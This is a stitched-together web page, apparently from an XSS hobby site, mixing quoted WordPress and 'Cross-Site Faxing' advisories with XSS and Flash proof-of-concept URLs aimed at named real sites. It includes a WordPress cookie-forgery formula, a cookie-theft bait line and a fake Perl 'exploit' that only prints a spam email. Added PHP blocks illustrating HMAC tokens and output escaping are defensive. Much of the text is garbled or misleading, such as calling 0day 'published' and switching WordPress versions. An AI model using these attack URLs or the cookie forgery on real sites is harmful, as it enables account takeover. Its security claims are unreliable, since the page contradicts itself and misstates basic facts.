How XSS Hacking Really Works
In this video tutorial we show you how to carry out basic cross-site scripting attacks against a vBulletin forum. This tutorial shows the basics of cookie stealing, JavaScript injection and forum hacking.
“A design flaw in the WordPress blog software authentication process makes it easier than previously believed for attackers to compromise a system. Most content management systems and blogs save user passwords as hashes in the underlying database. So even if attackers were to get access to the hashes stored in the database, for instance by means of an SQL injection hole, they have not been able to do much with them up to now.”
http://en.wikipedia.org/wiki/Password_Cracking
“Specifically, if they want to recover the passwords, they would have to compare a hash with entries in a “rainbow table” – a process that can take some time and may not work at all for long passwords, for which there simply are no tables.”
“But according to a security advisory published by Stephen J. Murdoch of the University of Cambridge, a property in WordPress can be exploited to get access without the password. Instead of trying to obtain the password, Murdoch used its hash to generate an authentication cookie to gain access to the system. A member of the core team behind The Onion Router (TOR) anonymization project, Murdoch says that the MD5 hash only has to be hashed a second time with MD5. According to his report, the authentication procedure implemented in WordPress then looks like:
wordpresspass_<MD5(url)>=MD5(user_pass)
Here, the URL is clearly spelled out, and user_pass corresponds to the hash (MD5(password)). Along with the wordpressuser cookie (that wordpressuser_<MD5(url)>=admin), access is then reportedly provided to the WordPress admin account. Murdoch says he has informed the developers of WordPress of the problem, but they have yet to react.”
http://en.wikipedia.org/wiki/HTTP_cookie
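The cookie formula quoted above takes all of its inputs from the users table, which is why a leaked hash is enough to log in. The following is an added example, not WordPress source and not from the advisory: it models the quoted scheme beside a keyed, expiring token. The function names, the server-side secret and all sample values are assumptions constructed for the illustration.

```php
<?php
// Added illustration, not WordPress source. Function names are hypothetical.

// Scheme as quoted above: the cookie value is MD5 of the stored hash,
// so every input to it lives in the users table.
function legacy_cookie(string $siteUrl, string $user, string $storedHash): array {
    $suffix = md5($siteUrl);
    return ["wordpressuser_$suffix" => $user,
            "wordpresspass_$suffix" => md5($storedHash)];
}
function legacy_check(array $c, string $siteUrl, string $user, string $storedHash): bool {
    $suffix = md5($siteUrl);
    return ($c["wordpressuser_$suffix"] ?? '') === $user
        && hash_equals(md5($storedHash), (string)($c["wordpresspass_$suffix"] ?? ''));
}

// Keyed alternative (assumption: $secret is kept outside the database).
// Binding in a slice of the stored hash expires tokens on password change.
function mac_input(string $user, int $expires, string $storedHash): string {
    return $user . '|' . $expires . '|' . substr($storedHash, 8, 4);
}
function keyed_token(string $user, string $storedHash, int $expires, string $secret): string {
    $mac = hash_hmac('sha256', mac_input($user, $expires, $storedHash), $secret);
    return "$user|$expires|$mac";
}
function keyed_check(string $token, string $storedHash, string $secret, int $now): bool {
    $parts = explode('|', $token);   // usernames containing '|' are out of scope here
    if (count($parts) !== 3 || !ctype_digit($parts[1])) return false;
    [$user, $expires, $mac] = $parts;
    if ((int)$expires < $now) return false;
    $expected = hash_hmac('sha256', mac_input($user, (int)$expires, $storedHash), $secret);
    return hash_equals($expected, $mac);
}

// Constructed sample values.
$siteUrl    = 'http://blog.example';
$storedHash = md5('constructed-password');   // users-table value, MD5(password)
$secret     = 'constructed-server-secret';
$now        = 1700000000;

// Case 1: database row only, legacy scheme. Case 2: database row only,
// keyed scheme with a guessed secret. Case 3: token issued by the server.
$fromDbOnly = legacy_cookie($siteUrl, 'admin', $storedHash);
$guessed    = keyed_token('admin', $storedHash, $now + 3600, 'not-the-secret');
$issued     = keyed_token('admin', $storedHash, $now + 3600, $secret);

var_dump(legacy_check($fromDbOnly, $siteUrl, 'admin', $storedHash));
var_dump(keyed_check($guessed, $storedHash, $secret, $now));
var_dump(keyed_check($issued, $storedHash, $secret, $now));
```

The three results show which checks a holder of the database row alone can satisfy: the legacy check needs nothing else, while the keyed check also needs the secret and an unexpired timestamp.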

This attack is a very dangerous 0day for WordPress 2.3. It only requires the hacker to first compromise administrator access to WordPress using another, more serious hole; then, instead of using admin access, creating new users, modifying users or backdooring WordPress, he can take the MD5 password hash from the hacked database and gain access as a user to the WordPress install he has previously hacked. All users are encouraged to upgrade. See more:
Sources:
http://heise-security.co.uk/ - Security and Internet Security Expert Consultants.
http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt
Dr Craig Wright has described a new attack vector known as Cross-Site Faxing (XSF) that abuses weaknesses in OCR 2.0 anti-phishing technology to bypass commercial anti-CSF appliances such as the i-XSS BloggerShield and UBsecure’s new XRCF Webfender 2.1.
On Nov 18, Dr Craig Wright (cwright@bdosyd.com.au) writes to pen-test:
“I have thought of an alternate path to loading a virus based on a network OCR’d fax server. In the scenario, we have to assume that the system is sending the output to a web front end or HTTP enabled email (not that uncommon).”
Dr Wright subsequently illustrates to the reader what he has previously written using the following hypothetical scenario:
“Now given that scenario, we have a possible XSS (cross-site-scripting) attack. If there are no filters for an outgoing connection (i.e. no firewall/proxy that strips scripts) and the client browser/email application allows access to the Internet, the attacker could create a script in the page that makes a call to an external system to download a file … a script could also embed a simple XOR obfuscation key to modify the downloaded code. On the web server it would be inert. When XOR’d with the key in the script (after being downloaded and installed), this will thus bypass the AV server (if there is one) and install the malware on the users system. […] Regards, Dr Craig Wright (GSE-Compliance)”
It is interesting to see this challenge considered by the security community. Are there currently any products we can purchase to scan incoming faxes? What about physical mail? A malicious attacker could embed scripting into an application form that is then printed and sent through snail mail to a recipient mail desk which scans the mail and forwards as a pdf or tiff image to the unsuspecting victim.
This attack is very deadly as it takes advantage of embed or macro or client side exploits against pdf or tiff clients and users. This is a very dangerous attack vector that must be explored, and all security consultants are encouraged to alert the wider community of the dangers of Cross Site Faxing and Cross-Site Postage exploits.
Click here to send your facebook cookies to xssworm (-;
We can upload JPG injected with JAR? or 2nd pass of redirect bugs. Facebook now allows embed of mp3 and other items using share bookmarks
javascript:var d=document,f='http://www.facebook.com/share',l=d.location,e=encodeURIComponent,p='.php?src=bm&v=4&i=1182484661&u='+e(l.href)+'&t='+e(d.title);1;try{if(!/^(.*\.)?facebook\.[^.]*$/.test(l.host))throw(0);share_internal_bookmarklet(p)}catch(z){a=function(){if(!window.open(f+'r'+p,'sharer','toolbar=0,status=0,resizable=0,width=626,height=436'))l.href=f+p};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else{a()}}void(0)
Facebook has many holes like this
vaj.
0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]
There is a serious hole in WordPress 2.3 that can be used with XSS by a blackhat hacker to attack the WordPress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to the public and this is the first day of public vulnerability, and 0day means ‘published.’
Below is a demonstration attack against the WordPress install at http://xssworm.blogvis.com – please do not use it for your attacks, as we do not have a patch for this 0day exploit. The XSSWorm admin has been alerted and will look for suspicious clicks (-;
Proof of concept:
http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>
This attack can be used against a WordPress web blog blogmin to steal blogosphere tokens to hack blogs. Of course, we have included exploit code for this bug below.
We have looked at the code for wp-slimstat but we cannot see any problem with input validation. Maybe some of the xssworm.com readers can show us where the problem is in the PHP code, because we cannot see any problem here:
–snips:
C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
'.(!empty($myFilterString)?'— <a href="?page='.$_GET['page'].'&panel='.$_GET["panel"].'">'.__('Reset filters', 'wp-slimstat').'</a>':'').'
<input type="hidden" name="page" value="'.$_GET['page'].'" />
<input type="hidden" name="panel" value="'.$_GET["panel"].'" />
<input type="hidden" name="fd" value="'.$_GET["fd"].'" /></form>';
–snips
With the programmer echoing $_GET variables from the user into HTML output, maybe PHP's automatic GET validation filtering is not working for security? We are not PHP programmers, so we cannot see any problems here, as the bugs are too complex to understand.
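In the lines shown, `$_GET['page']`, `$_GET['panel']` and `$_GET['fd']` are concatenated into HTML attribute values with no output escaping, while only `ff` and `ft` pass through `intval()`. The following is an added example, not the plugin's code: it reproduces the hidden-input pattern beside an escaped form and checks whether a harmless marker tag in a constructed request survives as markup. The function names and the marker value are hypothetical, and treating `panel` as numeric is an assumption.

```php
<?php
// Added illustration, not the plugin's code. Function names are hypothetical.

// Pattern from the findstr output above: request values are concatenated
// into attribute values with no output escaping.
function form_unescaped(array $get): string {
    return '<input type="hidden" name="page" value="' . $get['page'] . '" />'
         . '<input type="hidden" name="panel" value="' . $get['panel'] . '" />'
         . '<input type="hidden" name="fd" value="' . $get['fd'] . '" />';
}

// Escape for the HTML-attribute context at the point of output.
// ENT_QUOTES covers both quote styles, so the value cannot close the attribute.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

function form_escaped(array $get): string {
    // Assumption: panel is numeric (the URL on this page uses panel=1).
    $panel = (int)($get['panel'] ?? 1);
    $page  = attr((string)($get['page'] ?? ''));
    $fd    = attr((string)($get['fd'] ?? ''));
    return '<input type="hidden" name="page" value="' . $page . '" />'
         . '<input type="hidden" name="panel" value="' . $panel . '" />'
         . '<input type="hidden" name="fd" value="' . $fd . '" />';
}

// True when the marker tag from the input survives as live markup.
function marker_is_live(string $html): bool {
    return strpos($html, '<b id="marker">') !== false;
}

// Constructed request: a harmless marker that tries to close the attribute.
$get = [
    'page'  => 'wp-slimstat/wp-slimstat.php',
    'panel' => '1',
    'fd'    => '"><b id="marker">x</b>',
];

echo form_unescaped($get), "\n";
var_dump(marker_is_live(form_unescaped($get)));
echo form_escaped($get), "\n";
var_dump(marker_is_live(form_escaped($get)));
```

Inside current WordPress code the same job is done by `esc_attr()`; plain `htmlspecialchars()` is used here so the block runs without WordPress loaded.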
Exploit code for perl whitehats included here:
# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
#use Net::DNS:Simple;
#use Math;
use Socket;
print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <STDIN>;
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5); my $address = <STDIN>;
print "ok target is $target\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n — CUT OUTPUT HERE — \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
print "MAIL FROM: <xssworm\@hotmail.com>\n";
print "RCPT TO: <$target>\n";
print "DATA\n"; print "Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n — END OF OUTPUT CUT HERE –\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj\@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1); exit(0);
# snips
#
Please note that this wp-slimstat does not contain any code injection or MySQL injection bug vector that is open to blackhat attack via transport of XSS.
Many thanks for your comments on this vulnerability in WordPress 2.4.
Thanks vaj
Here we have some demonstrations of proofs for XSS scripting attacks and cross flash forgery on many sites.
We hope our readers will leave some feedback on these serious vulnerabilities.
SWF Exploit 1.)
We hit the target Shockwave file with a browser:
http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true
but on localhost we see:
Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive
..
(-;
Maybe the Blackhat attack to deny server users : host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com
The browser also requests:
http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true
but in the logger we see:
Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive
And in hacking MetaCafe we discovered a Shockwave XSS 0day attack that a blackhat could use to steal fish:
MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC
Demo:
http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&
We see this log output at XSSWORM.com:
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
snips…
We see many more serious vulnerabilities in web 2.0 today.
Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true
In server log:
connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/
(;
Please leave nice XSS comments.